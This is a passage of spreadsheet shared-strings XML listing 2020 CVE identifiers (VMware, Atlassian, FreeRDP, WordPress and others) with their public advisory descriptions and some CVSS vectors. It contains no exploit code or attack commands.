    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202006401-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.2), and Fusion (11.x before 11.5.2) contain an information leak in the EHCI USB controller. A malicious actor with local access to a virtual machine may be able to read privileged information contained in the hypervisor's memory. Additional conditions beyond the attacker's control need to be present for exploitation to be possible.</t>
  </si>
  <si>
    <t>CVE-2020-3965</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202006401-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.2), and Fusion (11.x before 11.5.2) contain an information leak in the XHCI USB controller. A malicious actor with local access to a virtual machine may be able to read privileged information contained in hypervisor memory from a virtual machine.</t>
  </si>
  <si>
    <t>CVE-2020-3966</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202004101-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.2), and Fusion (11.x before 11.5.2) contain a heap-overflow due to a race condition issue in the USB 2.0 controller (EHCI). A malicious actor with local access to a virtual machine may be able to exploit this vulnerability to execute code on the hypervisor from a virtual machine. Additional conditions beyond the attacker's control must be present for exploitation to be possible.</t>
  </si>
  <si>
    <t>CVE-2020-3967</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202004101-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.5), and Fusion (11.x before 11.5.5) contain a heap-overflow vulnerability in the USB 2.0 controller (EHCI). A malicious actor with local access to a virtual machine may be able to exploit this vulnerability to execute code on the hypervisor from a virtual machine. Additional conditions beyond the attacker's control must be present for exploitation to be possible.</t>
  </si>
  <si>
    <t>CVE-2020-3968</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202004101-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.5), and Fusion (11.x before 11.5.5) contain an out-of-bounds write vulnerability in the USB 3.0 controller (xHCI). A malicious actor with local administrative privileges on a virtual machine may be able to exploit this issue to crash the virtual machine's vmx process leading to a denial of service condition or execute code on the hypervisor from a virtual machine. Additional conditions beyond the attacker's control must be present for exploitation to be possible.</t>
  </si>
  <si>
    <t>CVE-2020-3969</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202004101-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.5), and Fusion (11.x before 11.5.5) contain an off-by-one heap-overflow vulnerability in the SVGA device. A malicious actor with local access to a virtual machine with 3D graphics enabled may be able to exploit this vulnerability to execute code on the hypervisor from a virtual machine. Additional conditions beyond the attacker's control must be present for exploitation to be possible.</t>
  </si>
  <si>
    <t>CVE-2020-3970</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202004101-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.5), and Fusion (11.x before 11.5.5) contain an out-of-bounds read vulnerability in the Shader functionality. A malicious actor with non-administrative local access to a virtual machine with 3D graphics enabled may be able to exploit this vulnerability to crash the virtual machine's vmx process leading to a partial denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-3971</t>
  </si>
  <si>
    <t>VMware ESXi (6.7 before ESXi670-201904101-SG and 6.5 before ESXi650-201907101-SG), Workstation (15.x before 15.0.2), and Fusion (11.x before 11.0.2) contain a heap overflow vulnerability in the vmxnet3 virtual network adapter. A malicious actor with local access to a virtual machine with a vmxnet3 network adapter present may be able to read privileged information contained in physical memory.</t>
  </si>
  <si>
    <t>CVE-2020-3972</t>
  </si>
  <si>
    <t>VMware Tools for macOS (11.x.x and prior before 11.1.1) contains a denial-of-service vulnerability in the Host-Guest File System (HGFS) implementation. Successful exploitation of this issue may allow attackers with non-admin privileges on guest macOS virtual machines to create a denial-of-service condition on their own VMs.</t>
  </si>
  <si>
    <t>CVE-2020-3973</t>
  </si>
  <si>
    <t>The VeloCloud Orchestrator does not apply correct input validation which allows for blind SQL-injection. A malicious actor with tenant access to Velocloud Orchestrator could enter specially crafted SQL queries and obtain data to which they are not privileged.</t>
  </si>
  <si>
    <t>CVE-2020-3974</t>
  </si>
  <si>
    <t>VMware Fusion (11.x before 11.5.5), VMware Remote Console for Mac (11.x and prior before 11.2.0 ) and Horizon Client for Mac (5.x and prior before 5.4.3) contain a privilege escalation vulnerability due to improper XPC Client validation. Successful exploitation of this issue may allow attackers with normal user privileges to escalate their privileges to root on the system where Fusion, VMware Remote Console for Mac or Horizon Client for Mac is installed.</t>
  </si>
  <si>
    <t>CVE-2020-3975</t>
  </si>
  <si>
    <t>VMware App Volumes 2.x prior to 2.18.6 and VMware App Volumes 4 prior to 2006 contain a Stored Cross-Site Scripting (XSS) vulnerability. A malicious actor with access to create and edit applications or create storage groups, may be able to inject malicious script which will be executed by a victim's browser when viewing.</t>
  </si>
  <si>
    <t>CVE-2020-3976</t>
  </si>
  <si>
    <t>VMware ESXi and vCenter Server contain a partial denial of service vulnerability in their respective authentication services. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.</t>
  </si>
  <si>
    <t>CVE-2020-3977</t>
  </si>
  <si>
    <t>VMware Horizon DaaS (7.x and 8.x before 8.0.1 Update 1) contains a broken authentication vulnerability due to a flaw in the way it handled the first factor authentication. Successful exploitation of this issue may allow an attacker to bypass two-factor authentication process. In order to exploit this issue, an attacker must have a legitimate account on Horizon DaaS.</t>
  </si>
  <si>
    <t>CVE-2020-3979</t>
  </si>
  <si>
    <t>InstallBuilder for Qt Windows (versions prior to 20.7.0) installers look for plugins at a predictable location at initialization time, writable by non-admin users. While those plugins are not required, they are loaded if present, which could allow an attacker to plant a malicious library which could result in code execution with the security scope of the installer.</t>
  </si>
  <si>
    <t>CVE-2020-3980</t>
  </si>
  <si>
    <t>VMware Fusion (11.x) contains a privilege escalation vulnerability due to the way it allows configuring the system wide path. An attacker with normal user privileges may exploit this issue to trick an admin user into executing malicious code on the system where Fusion is installed.</t>
  </si>
  <si>
    <t>CVE-2020-3981</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202008101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x), Fusion (11.x before 11.5.6) contain an out-of-bounds read vulnerability due to a time-of-check time-of-use issue in ACPI device. A malicious actor with administrative access to a virtual machine may be able to exploit this issue to leak memory from the vmx process.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-3982</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202008101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x), Fusion (11.x before 11.5.6) contain an out-of-bounds write vulnerability due to a time-of-check time-of-use issue in ACPI device. A malicious actor with administrative access to a virtual machine may be able to exploit this vulnerability to crash the virtual machine's vmx process or corrupt hypervisor's memory heap.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-3984</t>
  </si>
  <si>
    <t>The SD-WAN Orchestrator 3.3.2 prior to 3.3.2 P3 and 3.4.x prior to 3.4.4 does not apply correct input validation which allows for SQL-injection. An authenticated SD-WAN Orchestrator user may exploit a vulnerable API call using specially crafted SQL queries which may lead to unauthorized data access.</t>
  </si>
  <si>
    <t>CVE-2020-3985</t>
  </si>
  <si>
    <t>The SD-WAN Orchestrator 3.3.2 prior to 3.3.2 P3 and 3.4.x prior to 3.4.4 allows an access to set arbitrary authorization levels leading to a privilege escalation issue. An authenticated SD-WAN Orchestrator user may exploit an application weakness and call a vulnerable API to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3986</t>
  </si>
  <si>
    <t>VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (EMF Parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed.</t>
  </si>
  <si>
    <t>CVE-2020-3987</t>
  </si>
  <si>
    <t>VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (EMR STRETCHDIBITS parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed.</t>
  </si>
  <si>
    <t>CVE-2020-3988</t>
  </si>
  <si>
    <t>VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an out-of-bounds read vulnerability in Cortado ThinPrint component (JPEG2000 parser). A malicious actor with normal access to a virtual machine may be able to exploit these issues to create a partial denial-of-service condition or to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed.</t>
  </si>
  <si>
    <t>CVE-2020-3989</t>
  </si>
  <si>
    <t>VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain a denial of service vulnerability due to an out-of-bounds write issue in Cortado ThinPrint component. A malicious actor with normal access to a virtual machine may be able to exploit this issue to create a partial denial-of-service condition on the system where Workstation or Horizon Client for Windows is installed. Exploitation is only possible if virtual printing has been enabled. This feature is not enabled by default on Workstation but it is enabled by default on Horizon Client.</t>
  </si>
  <si>
    <t>CVE-2020-3990</t>
  </si>
  <si>
    <t>VMware Workstation (15.x) and Horizon Client for Windows (5.x before 5.4.4) contain an information disclosure vulnerability due to an integer overflow issue in Cortado ThinPrint component. A malicious actor with normal access to a virtual machine may be able to exploit this issue to leak memory from TPView process running on the system where Workstation or Horizon Client for Windows is installed. Exploitation is only possible if virtual printing has been enabled. This feature is not enabled by default on Workstation but it is enabled by default on Horizon Client.</t>
  </si>
  <si>
    <t>CVE-2020-3991</t>
  </si>
  <si>
    <t>VMware Horizon Client for Windows (5.x before 5.5.0) contains a denial-of-service vulnerability due to a file system access control issue during install time. Successful exploitation of this issue may allow an attacker to overwrite certain admin privileged files through a symbolic link attack at install time. This will result into a denial-of-service condition on the machine where Horizon Client for Windows is installed.</t>
  </si>
  <si>
    <t>CVE-2020-3992</t>
  </si>
  <si>
    <t>OpenSLP as used in VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202010401-SG, 6.5 before ESXi650-202010401-SG) has a use-after-free issue. A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3993</t>
  </si>
  <si>
    <t>VMware NSX-T (3.x before 3.0.2, 2.5.x before 2.5.2.2.0) contains a security vulnerability that exists in the way it allows a KVM host to download and install packages from NSX manager. A malicious actor with MITM positioning may be able to exploit this issue to compromise the transport node.</t>
  </si>
  <si>
    <t>CVE-2020-3994</t>
  </si>
  <si>
    <t>VMware vCenter Server (6.7 before 6.7u3, 6.6 before 6.5u3k) contains a session hijack vulnerability in the vCenter Server Appliance Management Interface update function due to a lack of certificate validation. A malicious actor with network positioning between vCenter Server and an update repository may be able to perform a session hijack when the vCenter Server Appliance Management Interface is used to download vCenter updates.</t>
  </si>
  <si>
    <t>CVE-2020-3995</t>
  </si>
  <si>
    <t>In VMware ESXi (6.7 before ESXi670-201908101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x before 15.1.0), Fusion (11.x before 11.1.0), the VMCI host drivers used by VMware hypervisors contain a memory leak vulnerability. A malicious actor with access to a virtual machine may be able to trigger a memory leak issue resulting in memory resource exhaustion on the hypervisor if the attack is sustained for extended periods of time.</t>
  </si>
  <si>
    <t>CVE-2020-3996</t>
  </si>
  <si>
    <t>Velero (prior to 1.4.3 and 1.5.2) in some instances doesn’t properly manage volume identifiers which may result in information leakage to unauthorized users.</t>
  </si>
  <si>
    <t>CVE-2020-3997</t>
  </si>
  <si>
    <t>VMware Horizon Server (7.x prior to 7.10.3 or 7.13.0) contains a Cross Site Scripting (XSS) vulnerability. Successful exploitation of this issue may allow an attacker to inject malicious script which will be executed.</t>
  </si>
  <si>
    <t>CVE-2020-3998</t>
  </si>
  <si>
    <t>VMware Horizon Client for Windows (5.x prior to 5.5.0) contains an information disclosure vulnerability. A malicious attacker with local privileges on the machine where Horizon Client for Windows is installed may be able to retrieve hashed credentials if the client crashes.</t>
  </si>
  <si>
    <t>CVE-2020-3999</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 prior to ESXi70U1c-17325551), VMware Workstation (16.x prior to 16.0 and 15.x prior to 15.5.7), VMware Fusion (12.x prior to 12.0 and 11.x prior to 11.5.7) and VMware Cloud Foundation contain a denial of service vulnerability due to improper input validation in GuestInfo. A malicious actor with normal user privilege access to a virtual machine can crash the virtual machine's vmx process leading to a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-4000</t>
  </si>
  <si>
    <t>The SD-WAN Orchestrator 3.3.2 prior to 3.3.2 P3, 3.4.x prior to 3.4.4, and 4.0.x prior to 4.0.1 allows for executing files through directory traversal. An authenticated SD-WAN Orchestrator user is able to traversal directories which may lead to code execution of files.</t>
  </si>
  <si>
    <t>CVE-2020-4001</t>
  </si>
  <si>
    <t>The SD-WAN Orchestrator 3.3.2, 3.4.x, and 4.0.x has default passwords allowing for a Pass-the-Hash Attack. SD-WAN Orchestrator ships with default passwords for predefined accounts which may lead to to a Pass-the-Hash attack.</t>
  </si>
  <si>
    <t>CVE-2020-4002</t>
  </si>
  <si>
    <t>The SD-WAN Orchestrator 3.3.2 prior to 3.3.2 P3, 3.4.x prior to 3.4.4, and 4.0.x prior to 4.0.1 handles system parameters in an insecure way. An authenticated SD-WAN Orchestrator user with high privileges may be able to execute arbitrary code on the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-4003</t>
  </si>
  <si>
    <t>VMware SD-WAN Orchestrator 3.3.2 prior to 3.3.2 P3, 3.4.x prior to 3.4.4, and 4.0.x prior to 4.0.1 was found to be vulnerable to SQL-injection attacks allowing for potential information disclosure. An authenticated SD-WAN Orchestrator user may inject code into SQL queries which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-4004</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi70U1b-17168206, 6.7 before ESXi670-202011101-SG, 6.5 before ESXi650-202011301-SG), Workstation (15.x before 15.5.7), Fusion (11.x before 11.5.7) contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.</t>
  </si>
  <si>
    <t>CVE-2020-4005</t>
  </si>
  <si>
    <t>VMware ESXi (7.0 before ESXi70U1b-17168206, 6.7 before ESXi670-202011101-SG, 6.5 before ESXi650-202011301-SG) contains a privilege-escalation vulnerability that exists in the way certain system calls are being managed. A malicious actor with privileges within the VMX process only, may escalate their privileges on the affected system. Successful exploitation of this issue is only possible when chained with another vulnerability (e.g. CVE-2020-4004)</t>
  </si>
  <si>
    <t>CVE-2020-4006</t>
  </si>
  <si>
    <t>VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector address have a command injection vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4008</t>
  </si>
  <si>
    <t>The installer of the macOS Sensor for VMware Carbon Black Cloud (prior to 3.5.1) handles certain files in an insecure way. A malicious actor who has local access to the endpoint on which a macOS sensor is going to be installed, may overwrite a limited number of files with output from the sensor installation.</t>
  </si>
  <si>
    <t>CVE-2020-4013</t>
  </si>
  <si>
    <t>The review resource in Atlassian Fisheye and Crucible before version 4.8.1 allows remote attackers to inject arbitrary HTML or Javascript via a cross site scripting (XSS) vulnerability through the review objectives.</t>
  </si>
  <si>
    <t>CVE-2020-4014</t>
  </si>
  <si>
    <t>The /profile/deleteWatch.do resource in Atlassian Fisheye and Crucible before version 4.8.1 allows remote attackers to remove another user's watching settings for a repository via an improper authorization vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4015</t>
  </si>
  <si>
    <t>The /json/fe/activeUserFinder.do resource in Altassian Fisheye and Crucible before version 4.8.1 allows remote attackers to view user user email addresses via a information disclosure vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4016</t>
  </si>
  <si>
    <t>The /plugins/servlet/jira-blockers/ resource in the crucible-jira-ril plugin in Atlassian Fisheye and Crucible before version 4.8.1 allows remote attackers to get the ID of configured Jira application links via an information disclosure vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4017</t>
  </si>
  <si>
    <t>The /rest/jira-ril/1.0/jira-rest/applinks resource in the crucible-jira-ril plugin in Atlassian Fisheye and Crucible before version 4.8.1 allows remote attackers to get information about any configured Jira application links via an information disclosure vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4018</t>
  </si>
  <si>
    <t>The setup resources in Atlassian Fisheye and Crucible before version 4.8.1 allows remote attackers to complete the setup process via a cross-site request forgery (CSRF) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4019</t>
  </si>
  <si>
    <t>The file editing functionality in the Atlassian Companion App before version 1.0.0 allows local attackers to have the app run a different executable in place of the app's cmd.exe via a untrusted search path vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4020</t>
  </si>
  <si>
    <t>The file downloading functionality in the Atlassian Companion App before version 1.0.0 allows remote attackers, who control a Confluence Server instance that the Companion App is connected to, execute arbitrary .exe files via a Protection Mechanism Failure.</t>
  </si>
  <si>
    <t>CVE-2020-4021</t>
  </si>
  <si>
    <t>Affected versions are: Before 8.5.5, and from 8.6.0 before 8.8.1 of Atlassian Jira Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the XML export view.</t>
  </si>
  <si>
    <t>CVE-2020-4022</t>
  </si>
  <si>
    <t>The attachment download resource in Atlassian Jira Server and Data Center before 8.5.5, and from 8.6.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability issue attachments with a mixed multipart content type.</t>
  </si>
  <si>
    <t>CVE-2020-4023</t>
  </si>
  <si>
    <t>The review coverage resource in Atlassian Fisheye and Crucible before version 4.8.2 allows remote attackers to inject arbitrary HTML or Javascript via a cross site scripting (XSS) vulnerability through the committerFilter parameter.</t>
  </si>
  <si>
    <t>CVE-2020-4024</t>
  </si>
  <si>
    <t>The attachment download resource in Atlassian Jira Server and Data Center before 8.5.5, and from 8.6.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability issue attachments with a vnd.wap.xhtml+xml content type.</t>
  </si>
  <si>
    <t>CVE-2020-4025</t>
  </si>
  <si>
    <t>The attachment download resource in Atlassian Jira Server and Data Center The attachment download resource in Atlassian Jira Server and Data Center before 8.5.5, and from 8.6.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability issue attachments with a rdf content type.</t>
  </si>
  <si>
    <t>CVE-2020-4026</t>
  </si>
  <si>
    <t>The CustomAppsRestResource list resource in Atlassian Navigator Links before version 3.3.23, from version 4.0.0 before version 4.3.7, from version 5.0.0 before 5.0.1, and from version 5.1.0 before 5.1.1 allows remote attackers to enumerate all linked applications, including those that are restricted or otherwise hidden, through an incorrect authorization check.</t>
  </si>
  <si>
    <t>CVE-2020-4027</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Confluence Server and Data Center allowed remote attackers with system administration permissions to bypass velocity template injection mitigations via an injection vulnerability in custom user macros. The affected versions are before version 7.4.5, and from version 7.5.0 before 7.5.1.</t>
  </si>
  <si>
    <t>CVE-2020-4028</t>
  </si>
  <si>
    <t>Versions before 8.9.1, Various resources in Jira responded with a 404 instead of redirecting unauthenticated users to the login page, in some situations this may have allowed unauthorised attackers to determine if certain resources exist or not through an Information Disclosure vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4029</t>
  </si>
  <si>
    <t>The /rest/project-templates/1.0/createshared resource in Atlassian Jira Server and Data Center before version 8.5.5, from 8.6.0 before 8.7.2, and from 8.8.0 before 8.8.1 allows remote attackers to enumerate project names via an improper authorization vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-4030</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, there is an out of bounds read in TrioParse. Logging might bypass string length checks due to an integer overflow. This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-4031</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, there is a use-after-free in gdi_SelectObject. All FreeRDP clients using compatibility mode with /relax-order-checks are affected. This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-4032</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, there is an integer casting vulnerability in update_recv_secondary_order. All clients with +glyph-cache /relax-order-checks are affected. This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-4033</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, there is an out of bounds read in RLEDECOMPRESS. All FreeRDP based clients with sessions with color depth &lt; 32 are affected. This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-4035</t>
  </si>
  <si>
    <t>In WatermelonDB (NPM package "@nozbe/watermelondb") before versions 0.15.1 and 0.16.2, a maliciously crafted record ID can exploit a SQL Injection vulnerability in iOS adapter implementation and cause the app to delete all or selected records from the database, generally causing the app to become unusable. This may happen in apps that don't validate IDs (valid IDs are `/^[a-zA-Z0-9_-.]+$/`) and use Watermelon Sync or low-level `database.adapter.destroyDeletedRecords` method. The integrity risk is low due to the fact that maliciously deleted records won't synchronize, so logout-login will restore all data, although some local changes may be lost if the malicious deletion causes the sync process to fail to proceed to push stage. No way to breach confidentiality with this vulnerability is known. Full exploitation of SQL Injection is mitigated, because it's not possible to nest an insert/update query inside a delete query in SQLite, and it's not possible to pass a semicolon-separated second query. There's also no known practicable way to breach confidentiality by selectively deleting records, because those records will not be synchronized. It's theoretically possible that selective record deletion could cause an app to behave insecurely if lack of a record is used to make security decisions by the app. This is patched in versions 0.15.1, 0.16.2, and 0.16.1-fix</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-4037</t>
  </si>
  <si>
    <t>In OAuth2 Proxy from version 5.1.1 and less than version 6.0.0, users can provide a redirect address for the proxy to send the authenticated user to at the end of the authentication flow. This is expected to be the original URL that the user was trying to access. This redirect URL is checked within the proxy and validated before redirecting the user to prevent malicious actors providing redirects to potentially harmful sites. This has been fixed in version 6.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-4038</t>
  </si>
  <si>
    <t>GraphQL Playground (graphql-playground-html NPM package) before version 1.6.22 have a severe XSS Reflection attack vulnerability. All unsanitized user input passed into renderPlaygroundPage() method could trigger this vulnerability. This has been patched in graphql-playground-html version 1.6.22. Note that some of the associated dependent middleware packages are also affected including but not limited to graphql-playground-middleware-express before version 1.7.16, graphql-playground-middleware-koa before version 1.6.15, graphql-playground-middleware-lambda before version 1.7.17, and graphql-playground-middleware-hapi before 1.6.13.</t>
  </si>
  <si>
    <t>CVE-2020-4039</t>
  </si>
  <si>
    <t>SUSI.AI is an intelligent Open Source personal assistant. SUSI.AI Server before version d27ed0f has a directory traversal vulnerability due to insufficient input validation. Any admin config and file readable by the app can be retrieved by the attacker. Furthermore, some files can also be moved or deleted.</t>
  </si>
  <si>
    <t>CVE-2020-4040</t>
  </si>
  <si>
    <t>Bolt CMS before version 3.7.1 lacked CSRF protection in the preview generating endpoint. Previews are intended to be generated by the admins, developers, chief-editors, and editors, who are authorized to create content in the application. But due to lack of proper CSRF protection, unauthorized users could generate a preview. This has been fixed in Bolt 3.7.1</t>
  </si>
  <si>
    <t>CVE-2020-4041</t>
  </si>
  <si>
    <t>In Bolt CMS before version 3.7.1, the filename of uploaded files was vulnerable to stored XSS. It is not possible to inject javascript code in the file name when creating/uploading the file. But, once created/uploaded, it can be renamed to inject the payload in it. Additionally, the measures to prevent renaming the file to disallowed filename extensions could be circumvented. This is fixed in Bolt 3.7.1.</t>
  </si>
  <si>
    <t>CVE-2020-4042</t>
  </si>
  <si>
    <t>Bareos before version 19.2.8 and earlier allows a malicious client to communicate with the director without knowledge of the shared secret if the director allows client initiated connection and connects to the client itself. The malicious client can replay the Bareos director's cram-md5 challenge to the director itself leading to the director responding to the replayed challenge. The response obtained is then a valid reply to the directors original challenge. This is fixed in version 19.2.8.</t>
  </si>
  <si>
    <t>CVE-2020-4043</t>
  </si>
  <si>
    <t>phpMussel from versions 1.0.0 and less than 1.6.0 has an unserialization vulnerability in PHP's phar wrapper. Uploading a specially crafted file to an affected version allows arbitrary code execution (discovered, tested, and confirmed by myself), so the risk factor should be regarded as very high. Newer phpMussel versions don't use PHP's phar wrapper, and are therefore unaffected. This has been fixed in version 1.6.0.</t>
  </si>
  <si>
    <t>CVE-2020-4044</t>
  </si>
  <si>
    <t>The xrdp-sesman service before version 0.9.13.1 can be crashed by connecting over port 3350 and supplying a malicious payload. Once the xrdp-sesman process is dead, an unprivileged attacker on the server could then proceed to start their own imposter sesman service listening on port 3350. This will allow them to capture any user credentials that are submitted to XRDP and approve or reject arbitrary login credentials. For xorgxrdp sessions in particular, this allows an unauthorized user to hijack an existing session. This is a buffer overflow attack, so there may be a risk of arbitrary code execution as well.</t>
  </si>
  <si>
    <t>CVE-2020-4045</t>
  </si>
  <si>
    <t>SSB-DB version 20.0.0 has an information disclosure vulnerability. The get() method is supposed to only decrypt messages when you explicitly ask it to, but there is a bug where it's decrypting any message that it can. This means that it is returning the decrypted content of private messages, which a malicious peer could use to get access to private data. This only affects peers running SSB-DB@20.0.0 who also have private messages, and is only known to be exploitable if you're also running SSB-OOO (default in SSB-Server), which exposes a thin wrapper around get() to anonymous peers. This is fixed in version 20.0.1. Note that users of SSB-Server verion 16.0.0 should upgrade to 16.0.1 to get the fixed version of SSB-DB.</t>
  </si>
  <si>
    <t>CVE-2020-4046</t>
  </si>
  <si>
    <t>In affected versions of WordPress, users with low privileges (like contributors and authors) can use the embed block in a certain way to inject unfiltered HTML in the block editor. When affected posts are viewed by a higher privileged user, this could lead to script execution in the editor/wp-admin. This has been patched in version 5.4.2, along with all the previously affected versions via a minor release (5.3.4, 5.2.7, 5.1.6, 5.0.10, 4.9.15, 4.8.14, 4.7.18, 4.6.19, 4.5.22, 4.4.23, 4.3.24, 4.2.28, 4.1.31, 4.0.31, 3.9.32, 3.8.34, 3.7.34).</t>
  </si>
  <si>
    <t>CVE-2020-4047</t>
  </si>
  <si>
    <t>In affected versions of WordPress, authenticated users with upload permissions (like authors) are able to inject JavaScript into some media file attachment pages in a certain way. This can lead to script execution in the context of a higher privileged user when the file is viewed by them. This has been patched in version 5.4.2, along with all the previously affected versions via a minor release (5.3.4, 5.2.7, 5.1.6, 5.0.10, 4.9.15, 4.8.14, 4.7.18, 4.6.19, 4.5.22, 4.4.23, 4.3.24, 4.2.28, 4.1.31, 4.0.31, 3.9.32, 3.8.34, 3.7.34).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-4048</t>
  </si>
  <si>
    <t>In affected versions of WordPress, due to an issue in wp_validate_redirect() and URL sanitization, an arbitrary external link can be crafted leading to unintended/open redirect when clicked. This has been patched in version 5.4.2, along with all the previously affected versions via a minor release (5.3.4, 5.2.7, 5.1.6, 5.0.10, 4.9.15, 4.8.14, 4.7.18, 4.6.19, 4.5.22, 4.4.23, 4.3.24, 4.2.28, 4.1.31, 4.0.31, 3.9.32, 3.8.34, 3.7.34).</t>
  </si>
  <si>
    <t>CVE-2020-4049</t>
  </si>
  <si>
    <t>In affected versions of WordPress, when uploading themes, the name of the theme folder can be crafted in a way that could lead to JavaScript execution in /wp-admin on the themes page. This does require an admin to upload the theme, and is low severity self-XSS. This has been patched in version 5.4.2, along with all the previously affected versions via a minor release (5.3.4, 5.2.7, 5.1.6, 5.0.10, 4.9.15, 4.8.14, 4.7.18, 4.6.19, 4.5.22, 4.4.23, 4.3.24, 4.2.28, 4.1.31, 4.0.31, 3.9.32, 3.8.34, 3.7.34).</t>
  </si>
  <si>
    <t>CVE-2020-4050</t>
  </si>
  <si>
    <t>In affected versions of WordPress, misuse of the `set-screen-option` filter's return value allows arbitrary user meta fields to be saved. It does require an admin to install a plugin that would misuse the filter. Once installed, it can be leveraged by low privileged users. This has been patched in version 5.4.2, along with all the previously affected versions via a minor release (5.3.4, 5.2.7, 5.1.6, 5.0.10, 4.9.15, 4.8.14, 4.7.18, 4.6.19, 4.5.22, 4.4.23, 4.3.24, 4.2.28, 4.1.31, 4.0.31, 3.9.32, 3.8.34, 3.7.34).</t>
  </si>
  <si>
    <t>CVE-2020-4051</t>
  </si>
  <si>
